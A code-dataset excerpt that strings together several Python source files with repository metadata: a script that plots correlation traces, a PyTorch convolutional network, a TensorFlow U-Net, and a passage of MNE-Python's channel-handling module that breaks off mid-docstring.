] | 16
|
2021-04-10T16:28:00.000Z
|
2021-12-12T10:15:23.000Z
|
messungen/noverplot.py
|
tihmstar/gido_public
|
dcc523603b9a27b37752211715a10e30b51ce812
|
[
"Unlicense"
] | null | null | null |
messungen/noverplot.py
|
tihmstar/gido_public
|
dcc523603b9a27b37752211715a10e30b51ce812
|
[
"Unlicense"
] | 2
|
2021-04-10T16:32:36.000Z
|
2021-04-11T14:13:45.000Z
|
import struct
import sys
import matplotlib.pyplot as plt
import numpy as np
import mmap
import os
fontsize = 30
ticksize = 3
legendsize = 18
POINTS_END = None
if len(sys.argv) < 2:
    print("Usage: %s <path ....>" %(sys.argv[0]))
    sys.exit(1)
for p in sys.argv[1:]:
file = p
filename = file.split("/")[-1]
try:
lastdir = file.split("/")[-2]
except:
lastdir = filename
try:
prepredir = file.split("/")[-3]
except:
prepredir = filename
arr = np.memmap(file, dtype='float64', mode='r')
r = "byte_"+filename.split("_")[-1]
# if POINTS_END:
# plt.plot(arr[0:POINTS_END], label=r)
# else:
## plt.plot(arr, label=r)
# plt.plot(arr, linestyle="", markersize=1, marker='.')
#plt.plot([4.5]*len(arr))
#plt.plot([-4.5]*len(arr))
maxpos = 0
maxval = 0
avgval = 0.0
avgcnt = 0.0
for i in range(len(arr)):
if abs(arr[i]) > maxval:
maxval = abs(arr[i])
maxpos = i
avgcnt += 1
avgval += (arr[i]-avgval)/avgcnt
aa = [None]*len(arr)
aa[maxpos] = arr[maxpos]
plt.plot(aa, linestyle="", markersize=20, marker='.', label=r)
print("Maxpos=%3d maxval=%f avgval=%f file=%s"%(maxpos,maxval,avgval,filename))
leg = plt.legend(loc="upper right", fontsize=legendsize)
for legobj in leg.legendHandles:
legobj.set_linewidth(ticksize)
ax = plt.axes()
ax.xaxis.offsetText.set_fontsize(fontsize)
ax.xaxis.set_tick_params(width=ticksize,length=ticksize*2)
ax.yaxis.offsetText.set_fontsize(fontsize)
ax.yaxis.set_tick_params(width=ticksize,length=ticksize*2)
f = plt.figure(1)
addval = 0.04
plt.subplots_adjust(left=f.subplotpars.left+addval, right=f.subplotpars.right+addval)
plt.xticks(fontsize=fontsize)
plt.yticks(fontsize=fontsize)
plt.xlabel('Samples', fontsize=fontsize)
plt.ylabel('Correlation', fontsize=fontsize)
#plt.title(lastdir.replace("_","-"), fontsize=fontsize)
#plt.savefig("traces_"+filename.replace(".dat",".png"))
plt.show()
| 23.647059
| 85
| 0.635323
|
c8ff8970d2282ace1d1293b887f16c5f6742fd0d
| 4,862
|
py
|
Python
|
model/shared_conv.py
|
chenzhuomit/6.860_final_project
|
5218b5ba127b8f36bbcf901ee8b3e97a8a8eaa3b
|
[
"MIT"
] | null | null | null |
model/shared_conv.py
|
chenzhuomit/6.860_final_project
|
5218b5ba127b8f36bbcf901ee8b3e97a8a8eaa3b
|
[
"MIT"
] | null | null | null |
model/shared_conv.py
|
chenzhuomit/6.860_final_project
|
5218b5ba127b8f36bbcf901ee8b3e97a8a8eaa3b
|
[
"MIT"
] | null | null | null |
import torch
from torch import nn
from torch.nn import functional as F
from .resnet import ResNet
class SharedResBlock(nn.Module):
def __init__(self, hidden_channels, kernel_size, batch_norm=True, resnet=True, dropout=0.):
super().__init__()
self.hidden_channels = hidden_channels
self.kernel_size = kernel_size
self.padding = kernel_size // 2 if kernel_size % 2 == 1 else (kernel_size // 2, kernel_size // 2 - 1)
self.batch_norm = batch_norm
self.resnet = resnet
self.dropout = dropout
layers = []
layers.append(nn.Conv2d(hidden_channels, hidden_channels, kernel_size, padding=self.padding))
if batch_norm:
layers.append(nn.BatchNorm2d(hidden_channels))
layers.append(nn.Dropout(dropout))
layers.append(nn.LeakyReLU())
layers.append(nn.Conv2d(hidden_channels, hidden_channels, kernel_size, padding=self.padding))
if batch_norm:
layers.append(nn.BatchNorm2d(hidden_channels))
layers.append(nn.Dropout(dropout))
layers.append(nn.LeakyReLU())
layers.append(nn.Conv2d(hidden_channels, hidden_channels, kernel_size, padding=self.padding))
if batch_norm:
layers.append(nn.BatchNorm2d(hidden_channels))
layers.append(nn.Dropout(dropout))
self.resblock = ResNet(nn.Sequential(*layers), resnet=resnet)
def forward(self, x):
return F.leaky_relu(self.resblock(x))
def count_params(self):
return sum(p.numel() for p in self.parameters())
class SharedConvLayer(nn.Module):
def __init__(self, in_channels, hidden_channels, out_channels, kernel_size1, kernel_size2, kernel_size3, batch_norm=True, pooling=True, resnet=True, dropout=0.):
super().__init__()
self.in_channels = in_channels
self.hidden_channels = hidden_channels
self.kernel_size1 = kernel_size1
self.kernel_size2 = kernel_size2
self.kernel_size3 = kernel_size3
self.padding1 = kernel_size1 // 2 if kernel_size1 % 2 == 1 else (kernel_size1 // 2, kernel_size1 // 2 - 1)
        self.padding3 = kernel_size3 // 2 if kernel_size3 % 2 == 1 else (kernel_size3 // 2, kernel_size3 // 2 - 1)
self.batch_norm = batch_norm
self.pooling = pooling
self.resnet = resnet
self.dropout = dropout
layers = []
layers.append(nn.Conv2d(in_channels, hidden_channels, self.kernel_size1, padding=self.padding1))
if batch_norm:
layers.append(nn.BatchNorm2d(hidden_channels))
layers.append(nn.Dropout(dropout))
layers.append(nn.LeakyReLU())
if pooling:
layers.append(nn.MaxPool2d(2))
layers.append(SharedResBlock(hidden_channels, self.kernel_size2, batch_norm, resnet, dropout))
if pooling:
layers.append(nn.MaxPool2d(2))
layers.append(nn.Conv2d(hidden_channels, out_channels, self.kernel_size3, padding=self.padding3))
if batch_norm:
layers.append(nn.BatchNorm2d(out_channels))
layers.append(nn.Dropout(dropout))
layers.append(nn.LeakyReLU())
if pooling:
layers.append(nn.MaxPool2d(2))
self.net = nn.Sequential(*layers)
def forward(self, x):
return self.net(x)
def count_params(self):
return sum(p.numel() for p in self.parameters())
class SharedConvNet(nn.Module):
def __init__(self, in_channels, hidden_channels, out_channels, kernel_size1, kernel_size2, kernel_size3, intermediate_dim, nb_classes, batch_norm=True, pooling=True, resnet=True, dropout=0., convdropout=0.):
super().__init__()
self.in_channels = in_channels
self.hidden_channels = hidden_channels
        self.intermediate_dim = intermediate_dim
self.nb_classes = nb_classes
self.batch_norm = batch_norm
self.pooling = pooling
self.resnet = resnet
self.dropout = dropout
self.convdropout = convdropout
self.convlayer = SharedConvLayer(in_channels, hidden_channels, out_channels, kernel_size1, kernel_size2, kernel_size3, batch_norm, pooling, resnet, convdropout)
if pooling:
self.conv_out_dim = 4 * 4 * out_channels
else:
self.conv_out_dim = 32 * 32 * out_channels
fflayer = []
fflayer.append(nn.Linear(self.conv_out_dim, intermediate_dim))
fflayer.append(nn.Dropout(dropout))
fflayer.append(nn.LeakyReLU())
fflayer.append(nn.Linear(intermediate_dim, nb_classes))
self.fflayer = nn.Sequential(*fflayer)
def forward(self, x):
y = self.convlayer(x)
y = y.view(y.shape[0], -1)
return self.fflayer(y)
def count_params(self):
return sum(p.numel() for p in self.parameters())
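# A minimal usage sketch (not part of the original module). Because of the relative
# import above, run it as a module from the package root, e.g. `python -m model.shared_conv`;
# the hyperparameters below are illustrative only.
if __name__ == "__main__":
    net = SharedConvNet(in_channels=3, hidden_channels=32, out_channels=64,
                        kernel_size1=3, kernel_size2=3, kernel_size3=3,
                        intermediate_dim=128, nb_classes=10)
    x = torch.randn(4, 3, 32, 32)  # a batch of four 32x32 RGB images
    logits = net(x)  # expected shape: (4, 10)
    print(logits.shape, net.count_params())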
| 43.026549
| 211
| 0.657754
|
3d56b1ce0b982af7e6b2409dbdd4215956836d27
| 8,698
|
py
|
Python
|
nn/unet.py
|
bohaohuang/ersa
|
e13ceae16929362f5ef49db1ab0f3237855aa2ac
|
[
"MIT"
] | null | null | null |
nn/unet.py
|
bohaohuang/ersa
|
e13ceae16929362f5ef49db1ab0f3237855aa2ac
|
[
"MIT"
] | null | null | null |
nn/unet.py
|
bohaohuang/ersa
|
e13ceae16929362f5ef49db1ab0f3237855aa2ac
|
[
"MIT"
] | 1
|
2020-07-01T16:54:11.000Z
|
2020-07-01T16:54:11.000Z
|
import os
import tensorflow as tf
from nn import basicNetwork
from nn import nn_utils
class UNet(basicNetwork.SegmentationNetwork):
"""
Implements the U-Net from https://arxiv.org/pdf/1505.04597.pdf
"""
def __init__(self, class_num, input_size, dropout_rate=None, name='unet', suffix='', learn_rate=1e-4,
decay_step=60, decay_rate=0.1, epochs=100, batch_size=5, start_filter_num=32):
"""
Initialize the object
:param class_num: class number in labels, determine the # of output units
:param input_size: input patch size
:param dropout_rate: dropout rate in each layer, if it is None, no dropout will be used
:param name: name of this network
:param suffix: used to create a unique name of the network
:param learn_rate: start learning rate
:param decay_step: #steps before the learning rate decay
:param decay_rate: learning rate will be decayed to lr*decay_rate
:param epochs: #epochs to train
:param batch_size: batch size
:param start_filter_num: #filters at the first layer
"""
self.sfn = start_filter_num
super().__init__(class_num, input_size, dropout_rate, name, suffix, learn_rate, decay_step,
decay_rate, epochs, batch_size)
def create_graph(self, feature, **kwargs):
"""
Create graph for the U-Net
:param feature: input image
:param start_filter_num: #filters at the start layer, #filters in U-Net grows exponentially
:return:
"""
sfn = self.sfn
# downsample
conv1, pool1 = nn_utils.conv_conv_pool(feature, [sfn, sfn], self.mode, name='conv1',
padding='valid', dropout=self.dropout_rate)
conv2, pool2 = nn_utils.conv_conv_pool(pool1, [sfn * 2, sfn * 2], self.mode, name='conv2',
padding='valid', dropout=self.dropout_rate)
conv3, pool3 = nn_utils.conv_conv_pool(pool2, [sfn * 4, sfn * 4], self.mode, name='conv3',
padding='valid', dropout=self.dropout_rate)
conv4, pool4 = nn_utils.conv_conv_pool(pool3, [sfn * 8, sfn * 8], self.mode, name='conv4',
padding='valid', dropout=self.dropout_rate)
conv5 = nn_utils.conv_conv_pool(pool4, [sfn * 16, sfn * 16], self.mode, name='conv5', pool=False,
padding='valid', dropout=self.dropout_rate)
# upsample
up6 = nn_utils.crop_upsample_concat(conv5, conv4, 8, name='6')
conv6 = nn_utils.conv_conv_pool(up6, [sfn * 8, sfn * 8], self.mode, name='up6', pool=False,
padding='valid', dropout=self.dropout_rate)
        up7 = nn_utils.crop_upsample_concat(conv6, conv3, 32, name='7')
conv7 = nn_utils.conv_conv_pool(up7, [sfn * 4, sfn * 4], self.mode, name='up7', pool=False,
padding='valid', dropout=self.dropout_rate)
up8 = nn_utils.crop_upsample_concat(conv7, conv2, 80, name='8')
conv8 = nn_utils.conv_conv_pool(up8, [sfn * 2, sfn * 2], self.mode, name='up8', pool=False,
padding='valid', dropout=self.dropout_rate)
up9 = nn_utils.crop_upsample_concat(conv8, conv1, 176, name='9')
conv9 = nn_utils.conv_conv_pool(up9, [sfn, sfn], self.mode, name='up9', pool=False,
padding='valid', dropout=self.dropout_rate)
self.pred = tf.layers.conv2d(conv9, self.class_num, (1, 1), name='final', activation=None, padding='same')
self.output = tf.nn.softmax(self.pred)
@staticmethod
def get_overlap():
"""
Get #pixels overlap between two output images
This is necessary to determine how patches are extracted
:return:
"""
return 184
@staticmethod
def is_valid_patch_size(ps):
"""
        Due to the existence of cropping and pooling, U-Net cannot take an arbitrary input size.
        This function determines whether an input size is valid; otherwise it returns the closest valid size.
:param ps: input patch size, should be a tuple
:return: True if ps is valid, otherwise the closest valid input size
"""
if (ps[0] - 124) % 32 == 0 and (ps[1] - 124) % 32 == 0:
return True
else:
            ps_0 = ((ps[0] - 124) // 32) * 32 + 124
            ps_1 = ((ps[1] - 124) // 32) * 32 + 124
return tuple([ps_0, ps_1])
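    # Worked example (illustrative): with the 184-pixel overlap above, a valid input
    # size satisfies (size - 124) % 32 == 0. For instance (572, 572) -- the patch
    # size of the original U-Net paper -- is valid and yields a 388x388 output
    # (572 - 184), while (500, 500) is rounded down to the closest valid size
    # (476, 476).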
    @staticmethod
def load_weights(ckpt_dir, layers2load):
"""
This is different from network.load(). This function only loads specified layers
:param ckpt_dir: path to the model to load
:param layers2load: could be a list, or string where numbers separated by ,
:return:
"""
layers_list = []
if isinstance(layers2load, str):
layers2load = [int(a) for a in layers2load.split(',')]
for layer_id in layers2load:
assert 1 <= layer_id <= 9
if layer_id <= 5:
prefix = 'layerconv'
else:
prefix = 'layerup'
layers_list.append('{}{}'.format(prefix, layer_id))
load_dict = {}
for layer_name in layers_list:
feed_layer = layer_name + '/'
load_dict[feed_layer] = feed_layer
try:
latest_check_point = tf.train.latest_checkpoint(ckpt_dir)
tf.contrib.framework.init_from_checkpoint(ckpt_dir, load_dict)
print('loaded {}'.format(latest_check_point))
except tf.errors.NotFoundError:
with open(os.path.join(ckpt_dir, 'checkpoint'), 'r') as f:
ckpts = f.readlines()
ckpt_file_name = ckpts[0].split('/')[-1].strip().strip('\"')
latest_check_point = os.path.join(ckpt_dir, ckpt_file_name)
tf.contrib.framework.init_from_checkpoint(latest_check_point, load_dict)
print('loaded {}'.format(latest_check_point))
def make_loss(self, label, loss_type='xent', **kwargs):
"""
Make loss to optimize for the network
U-Net's output is smaller than input, thus ground truth need to be cropped
:param label: input labels, can be generated by tf.data.Dataset
:param loss_type:
xent: cross entropy loss
:return:
"""
with tf.variable_scope('loss'):
pred_flat = tf.reshape(self.pred, [-1, self.class_num])
_, w, h, _ = label.get_shape().as_list()
y = tf.image.resize_image_with_crop_or_pad(label, w - self.get_overlap(), h - self.get_overlap())
y_flat = tf.reshape(tf.squeeze(y, axis=[3]), [-1, ])
indices = tf.squeeze(tf.where(tf.less_equal(y_flat, self.class_num - 1)), 1)
gt = tf.gather(y_flat, indices)
prediction = tf.gather(pred_flat, indices)
pred = tf.argmax(prediction, axis=-1, output_type=tf.int32)
if self.class_num == 2:
self.loss_iou = self.create_resetable_metric_single_iou(scope=tf.get_variable_scope().name,
labels=gt, predictions=pred, num_classes=self.class_num, name='loss_iou')
else:
self.loss_iou = self.create_resetable_metric(tf.metrics.mean_iou, var_name='loss_iou',
scope=tf.get_variable_scope().name,
labels=gt, predictions=pred, num_classes=self.class_num,
name='loss_iou')
if loss_type == 'xent':
if 'pos_weight' in kwargs:
self.loss = tf.reduce_mean(tf.nn.weighted_cross_entropy_with_logits(
logits=prediction, labels=gt, pos_weight=kwargs['pos_weight']))
else:
self.loss = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(
logits=prediction, labels=gt))
self.loss_xent = self.create_resetable_metric(tf.metrics.mean, var_name='loss_xent',
scope=tf.get_variable_scope().name,
values=self.loss, name='loss_xent')
else:
# TODO focal loss:
# https://github.com/ailias/Focal-Loss-implement-on-Tensorflow/blob/master/focal_loss.py
self.loss = None
| 51.164706
| 117
| 0.57381
|
cf82c65798c705b2bc67382367b8caae76726a4b
| 53,961
|
py
|
Python
|
mne/channels/channels.py
|
massich/mne-python
|
9afcbcb21ca5df53eaf26911d0199dcc04bfc4ba
|
[
"BSD-3-Clause"
] | null | null | null |
mne/channels/channels.py
|
massich/mne-python
|
9afcbcb21ca5df53eaf26911d0199dcc04bfc4ba
|
[
"BSD-3-Clause"
] | 23
|
2017-09-12T11:08:26.000Z
|
2019-10-04T11:11:29.000Z
|
mne/channels/channels.py
|
massich/mne-python
|
9afcbcb21ca5df53eaf26911d0199dcc04bfc4ba
|
[
"BSD-3-Clause"
] | 3
|
2019-01-28T13:48:00.000Z
|
2019-07-10T16:02:11.000Z
|
# Authors: Alexandre Gramfort <alexandre.gramfort@inria.fr>
# Matti Hamalainen <msh@nmr.mgh.harvard.edu>
# Denis Engemann <denis.engemann@gmail.com>
# Andrew Dykstra <andrew.r.dykstra@gmail.com>
# Teon Brooks <teon.brooks@gmail.com>
#
# License: BSD (3-clause)
import os
import os.path as op
import sys
import numpy as np
from scipy import sparse
from ..utils import (verbose, logger, warn, copy_function_doc_to_method_doc,
_check_preload, _validate_type, fill_doc, _check_option)
from ..io.compensator import get_current_comp
from ..io.constants import FIFF
from ..io.meas_info import anonymize_info, Info
from ..io.pick import (channel_type, pick_info, pick_types, _picks_by_type,
_check_excludes_includes, _contains_ch_type,
channel_indices_by_type, pick_channels, _picks_to_idx)
DEPRECATED_PARAM = object()
def _get_meg_system(info):
"""Educated guess for the helmet type based on channels."""
have_helmet = True
for ch in info['chs']:
if ch['kind'] == FIFF.FIFFV_MEG_CH:
# Only take first 16 bits, as higher bits store CTF grad comp order
coil_type = ch['coil_type'] & 0xFFFF
if coil_type == FIFF.FIFFV_COIL_NM_122:
system = '122m'
break
elif coil_type // 1000 == 3: # All Vectorview coils are 30xx
system = '306m'
break
elif (coil_type == FIFF.FIFFV_COIL_MAGNES_MAG or
coil_type == FIFF.FIFFV_COIL_MAGNES_GRAD):
nmag = np.sum([c['kind'] == FIFF.FIFFV_MEG_CH
for c in info['chs']])
system = 'Magnes_3600wh' if nmag > 150 else 'Magnes_2500wh'
break
elif coil_type == FIFF.FIFFV_COIL_CTF_GRAD:
system = 'CTF_275'
break
elif coil_type == FIFF.FIFFV_COIL_KIT_GRAD:
system = 'KIT'
break
elif coil_type == FIFF.FIFFV_COIL_BABY_GRAD:
system = 'BabySQUID'
break
elif coil_type == FIFF.FIFFV_COIL_ARTEMIS123_GRAD:
system = 'ARTEMIS123'
have_helmet = False
break
else:
system = 'unknown'
have_helmet = False
return system, have_helmet
def _get_ch_type(inst, ch_type, allow_ref_meg=False):
"""Choose a single channel type (usually for plotting).
Usually used in plotting to plot a single datatype, e.g. look for mags,
then grads, then ... to plot.
"""
if ch_type is None:
allowed_types = ['mag', 'grad', 'planar1', 'planar2', 'eeg']
allowed_types += ['ref_meg'] if allow_ref_meg else []
for type_ in allowed_types:
if isinstance(inst, Info):
if _contains_ch_type(inst, type_):
ch_type = type_
break
elif type_ in inst:
ch_type = type_
break
else:
raise RuntimeError('No plottable channel types found')
return ch_type
@verbose
def equalize_channels(candidates, verbose=None):
"""Equalize channel picks for a collection of MNE-Python objects.
Parameters
----------
candidates : list
        List of Raw | Epochs | Evoked | AverageTFR instances.
%(verbose)s
Notes
-----
This function operates inplace.
"""
from ..io.base import BaseRaw
from ..epochs import BaseEpochs
from ..evoked import Evoked
from ..time_frequency import _BaseTFR
for candidate in candidates:
_validate_type(candidate,
(BaseRaw, BaseEpochs, Evoked, _BaseTFR),
"Instances to be modified",
"Raw, Epochs, Evoked or TFR")
chan_max_idx = np.argmax([c.info['nchan'] for c in candidates])
chan_template = candidates[chan_max_idx].ch_names
logger.info('Identifying common channels ...')
channels = [set(c.ch_names) for c in candidates]
common_channels = set(chan_template).intersection(*channels)
dropped = list()
for c in candidates:
drop_them = list(set(c.ch_names) - common_channels)
if drop_them:
c.drop_channels(drop_them)
dropped.extend(drop_them)
if dropped:
dropped = list(set(dropped))
logger.info('Dropped the following channels:\n%s' % dropped)
else:
logger.info('all channels are corresponding, nothing to do.')
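# Illustrative call (not part of the original module), assuming two Epochs objects
# recorded with different channel selections; both are modified in place so that
# only their common channels remain:
#
#     equalize_channels([epochs_a, epochs_b])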
class ContainsMixin(object):
"""Mixin class for Raw, Evoked, Epochs."""
def __contains__(self, ch_type):
"""Check channel type membership.
Parameters
----------
ch_type : str
Channel type to check for. Can be e.g. 'meg', 'eeg', 'stim', etc.
Returns
-------
in : bool
Whether or not the instance contains the given channel type.
Examples
--------
Channel type membership can be tested as::
>>> 'meg' in inst # doctest: +SKIP
True
>>> 'seeg' in inst # doctest: +SKIP
False
"""
if ch_type == 'meg':
has_ch_type = (_contains_ch_type(self.info, 'mag') or
_contains_ch_type(self.info, 'grad'))
else:
has_ch_type = _contains_ch_type(self.info, ch_type)
return has_ch_type
@property
def compensation_grade(self):
"""The current gradient compensation grade."""
return get_current_comp(self.info)
# XXX Eventually de-duplicate with _kind_dict of mne/io/meas_info.py
_human2fiff = {'ecg': FIFF.FIFFV_ECG_CH,
'eeg': FIFF.FIFFV_EEG_CH,
'emg': FIFF.FIFFV_EMG_CH,
'eog': FIFF.FIFFV_EOG_CH,
'exci': FIFF.FIFFV_EXCI_CH,
'ias': FIFF.FIFFV_IAS_CH,
'misc': FIFF.FIFFV_MISC_CH,
'resp': FIFF.FIFFV_RESP_CH,
'seeg': FIFF.FIFFV_SEEG_CH,
'stim': FIFF.FIFFV_STIM_CH,
'syst': FIFF.FIFFV_SYST_CH,
'bio': FIFF.FIFFV_BIO_CH,
'ecog': FIFF.FIFFV_ECOG_CH,
'fnirs_raw': FIFF.FIFFV_FNIRS_CH,
'fnirs_od': FIFF.FIFFV_FNIRS_CH,
'hbo': FIFF.FIFFV_FNIRS_CH,
'hbr': FIFF.FIFFV_FNIRS_CH}
_human2unit = {'ecg': FIFF.FIFF_UNIT_V,
'eeg': FIFF.FIFF_UNIT_V,
'emg': FIFF.FIFF_UNIT_V,
'eog': FIFF.FIFF_UNIT_V,
'exci': FIFF.FIFF_UNIT_NONE,
'ias': FIFF.FIFF_UNIT_NONE,
'misc': FIFF.FIFF_UNIT_V,
'resp': FIFF.FIFF_UNIT_NONE,
'seeg': FIFF.FIFF_UNIT_V,
'stim': FIFF.FIFF_UNIT_NONE,
'syst': FIFF.FIFF_UNIT_NONE,
'bio': FIFF.FIFF_UNIT_V,
'ecog': FIFF.FIFF_UNIT_V,
'fnirs_raw': FIFF.FIFF_UNIT_V,
'fnirs_od': FIFF.FIFF_UNIT_NONE,
'hbo': FIFF.FIFF_UNIT_MOL,
'hbr': FIFF.FIFF_UNIT_MOL}
_unit2human = {FIFF.FIFF_UNIT_V: 'V',
FIFF.FIFF_UNIT_T: 'T',
FIFF.FIFF_UNIT_T_M: 'T/m',
FIFF.FIFF_UNIT_MOL: 'M',
FIFF.FIFF_UNIT_NONE: 'NA',
FIFF.FIFF_UNIT_CEL: 'C'}
def _check_set(ch, projs, ch_type):
"""Ensure type change is compatible with projectors."""
new_kind = _human2fiff[ch_type]
if ch['kind'] != new_kind:
for proj in projs:
if ch['ch_name'] in proj['data']['col_names']:
raise RuntimeError('Cannot change channel type for channel %s '
'in projector "%s"'
% (ch['ch_name'], proj['desc']))
ch['kind'] = new_kind
class SetChannelsMixin(object):
"""Mixin class for Raw, Evoked, Epochs."""
@verbose
def set_eeg_reference(self, ref_channels='average', projection=False,
ch_type='auto', verbose=None):
"""Specify which reference to use for EEG data.
By default, MNE-Python will automatically re-reference the EEG signal
to use an average reference (see below). Use this function to
explicitly specify the desired reference for EEG. This can be either an
existing electrode or a new virtual channel. This function will
re-reference the data according to the desired reference and prevent
MNE-Python from automatically adding an average reference projection.
Some common referencing schemes and the corresponding value for the
``ref_channels`` parameter:
No re-referencing:
If the EEG data is already using the proper reference, set
``ref_channels=[]``. This will prevent MNE-Python from
automatically adding an average reference projection.
Average reference:
A new virtual reference electrode is created by averaging the
current EEG signal by setting ``ref_channels='average'``. Bad EEG
channels are automatically excluded if they are properly set in
``info['bads']``.
A single electrode:
Set ``ref_channels`` to a list containing the name of the channel
that will act as the new reference, for example
``ref_channels=['Cz']``.
The mean of multiple electrodes:
A new virtual reference electrode is created by computing the
average of the current EEG signal recorded from two or more
selected channels. Set ``ref_channels`` to a list of channel names,
indicating which channels to use. For example, to apply an average
mastoid reference, when using the 10-20 naming scheme, set
``ref_channels=['M1', 'M2']``.
Parameters
----------
ref_channels : list of str | str
The name(s) of the channel(s) used to construct the reference. To
apply an average reference, specify ``'average'`` here (default).
If an empty list is specified, the data is assumed to already have
a proper reference and MNE will not attempt any re-referencing of
the data. Defaults to an average reference.
projection : bool
If ``ref_channels='average'`` this argument specifies if the
average reference should be computed as a projection (True) or not
(False; default). If ``projection=True``, the average reference is
added as a projection and is not applied to the data (it can be
applied afterwards with the ``apply_proj`` method). If
``projection=False``, the average reference is directly applied to
the data. If ``ref_channels`` is not ``'average'``, ``projection``
must be set to ``False`` (the default in this case).
ch_type : 'auto' | 'eeg' | 'ecog' | 'seeg'
The name of the channel type to apply the reference to. If 'auto',
the first channel type of eeg, ecog or seeg that is found (in that
order) will be selected.
.. versionadded:: 0.19
%(verbose_meth)s
Returns
-------
inst : instance of Raw | Epochs | Evoked
Data with EEG channels re-referenced. If ``ref_channels='average'``
and ``projection=True`` a projection will be added instead of
directly re-referencing the data.
See Also
--------
mne.set_bipolar_reference : Convenience function for creating bipolar
references.
Notes
-----
1. If a reference is requested that is not the average reference, this
function removes any pre-existing average reference projections.
2. During source localization, the EEG signal should have an average
reference.
3. In order to apply a reference, the data must be preloaded. This is
not necessary if ``ref_channels='average'`` and ``projection=True``.
4. For an average reference, bad EEG channels are automatically
excluded if they are properly set in ``info['bads']``.
.. versionadded:: 0.9.0
"""
from ..io.reference import set_eeg_reference
return set_eeg_reference(self, ref_channels=ref_channels, copy=False,
projection=projection, ch_type=ch_type)[0]
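    # Illustrative calls (not part of the original module), assuming a Raw instance
    # ``raw`` whose montage contains channels named 'M1' and 'M2':
    #
    #     raw.set_eeg_reference(ref_channels=['M1', 'M2'])   # mean-mastoid reference
    #     raw.set_eeg_reference('average', projection=True)  # average reference as a projection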
def _get_channel_positions(self, picks=None):
"""Get channel locations from info.
Parameters
----------
picks : str | list | slice | None
None gets good data indices.
Notes
-----
.. versionadded:: 0.9.0
"""
picks = _picks_to_idx(self.info, picks)
chs = self.info['chs']
pos = np.array([chs[k]['loc'][:3] for k in picks])
n_zero = np.sum(np.sum(np.abs(pos), axis=1) == 0)
if n_zero > 1: # XXX some systems have origin (0, 0, 0)
raise ValueError('Could not extract channel positions for '
'{} channels'.format(n_zero))
return pos
def _set_channel_positions(self, pos, names):
"""Update channel locations in info.
Parameters
----------
pos : array-like | np.ndarray, shape (n_points, 3)
The channel positions to be set.
names : list of str
The names of the channels to be set.
Notes
-----
.. versionadded:: 0.9.0
"""
if len(pos) != len(names):
raise ValueError('Number of channel positions not equal to '
'the number of names given.')
pos = np.asarray(pos, dtype=np.float)
if pos.shape[-1] != 3 or pos.ndim != 2:
msg = ('Channel positions must have the shape (n_points, 3) '
'not %s.' % (pos.shape,))
raise ValueError(msg)
for name, p in zip(names, pos):
if name in self.ch_names:
idx = self.ch_names.index(name)
self.info['chs'][idx]['loc'][:3] = p
else:
msg = ('%s was not found in the info. Cannot be updated.'
% name)
raise ValueError(msg)
def set_channel_types(self, mapping):
"""Define the sensor type of channels.
Note: The following sensor types are accepted:
        ecg, eeg, emg, eog, exci, ias, misc, resp, seeg, stim, syst, ecog,
        bio, hbo, hbr, fnirs_raw, fnirs_od
Parameters
----------
mapping : dict
            A dictionary mapping a channel name to a sensor type (str),
            e.g. {'EEG061': 'eog'}.
Notes
-----
.. versionadded:: 0.9.0
"""
ch_names = self.info['ch_names']
# first check and assemble clean mappings of index and name
unit_changes = dict()
for ch_name, ch_type in mapping.items():
if ch_name not in ch_names:
raise ValueError("This channel name (%s) doesn't exist in "
"info." % ch_name)
c_ind = ch_names.index(ch_name)
if ch_type not in _human2fiff:
raise ValueError('This function cannot change to this '
'channel type: %s. Accepted channel types '
'are %s.'
% (ch_type,
", ".join(sorted(_human2unit.keys()))))
# Set sensor type
_check_set(self.info['chs'][c_ind], self.info['projs'], ch_type)
unit_old = self.info['chs'][c_ind]['unit']
unit_new = _human2unit[ch_type]
if unit_old not in _unit2human:
raise ValueError("Channel '%s' has unknown unit (%s). Please "
"fix the measurement info of your data."
% (ch_name, unit_old))
if unit_old != _human2unit[ch_type]:
this_change = (_unit2human[unit_old], _unit2human[unit_new])
if this_change not in unit_changes:
unit_changes[this_change] = list()
unit_changes[this_change].append(ch_name)
self.info['chs'][c_ind]['unit'] = _human2unit[ch_type]
if ch_type in ['eeg', 'seeg', 'ecog']:
coil_type = FIFF.FIFFV_COIL_EEG
elif ch_type == 'hbo':
coil_type = FIFF.FIFFV_COIL_FNIRS_HBO
elif ch_type == 'hbr':
coil_type = FIFF.FIFFV_COIL_FNIRS_HBR
elif ch_type == 'fnirs_raw':
coil_type = FIFF.FIFFV_COIL_FNIRS_RAW
elif ch_type == 'fnirs_od':
coil_type = FIFF.FIFFV_COIL_FNIRS_OD
else:
coil_type = FIFF.FIFFV_COIL_NONE
self.info['chs'][c_ind]['coil_type'] = coil_type
msg = "The unit for channel(s) {0} has changed from {1} to {2}."
for this_change, names in unit_changes.items():
warn(msg.format(", ".join(sorted(names)), *this_change))
def rename_channels(self, mapping):
"""Rename channels.
Parameters
----------
mapping : dict | callable
            A dictionary mapping an old channel name to a new channel name,
            e.g. {'EEG061': 'EEG161'}. Can also be a callable function
            that takes and returns a string (new in version 0.10.0).
Notes
-----
.. versionadded:: 0.9.0
"""
rename_channels(self.info, mapping)
@verbose
def set_montage(
self, montage, raise_if_subset=DEPRECATED_PARAM, verbose=None
):
"""Set EEG sensor configuration and head digitization.
Parameters
----------
%(montage)s
        raise_if_subset : bool
If True, ValueError will be raised when montage.ch_names is a
subset of info['ch_names']. This parameter was introduced for
backward compatibility when set to False.
Defaults to False in 0.19, it will change to default to True in
0.20, and will be removed in 0.21.
.. versionadded: 0.19
%(verbose_meth)s
Notes
-----
Operates in place.
.. versionadded:: 0.9.0
"""
# How to set up a montage to old named fif file (walk through example)
# https://gist.github.com/massich/f6a9f4799f1fbeb8f5e8f8bc7b07d3df
from .montage import _set_montage
_set_montage(self.info, montage, raise_if_subset=raise_if_subset)
return self
def plot_sensors(self, kind='topomap', ch_type=None, title=None,
show_names=False, ch_groups=None, to_sphere=True,
axes=None, block=False, show=True):
"""Plot sensor positions.
Parameters
----------
kind : str
Whether to plot the sensors as 3d, topomap or as an interactive
sensor selection dialog. Available options 'topomap', '3d',
'select'. If 'select', a set of channels can be selected
interactively by using lasso selector or clicking while holding
control key. The selected channels are returned along with the
figure instance. Defaults to 'topomap'.
ch_type : None | str
The channel type to plot. Available options 'mag', 'grad', 'eeg',
'seeg', 'ecog', 'all'. If ``'all'``, all the available mag, grad,
eeg, seeg and ecog channels are plotted. If None (default), then
channels are chosen in the order given above.
title : str | None
Title for the figure. If None (default), equals to ``'Sensor
positions (%s)' % ch_type``.
show_names : bool | array of str
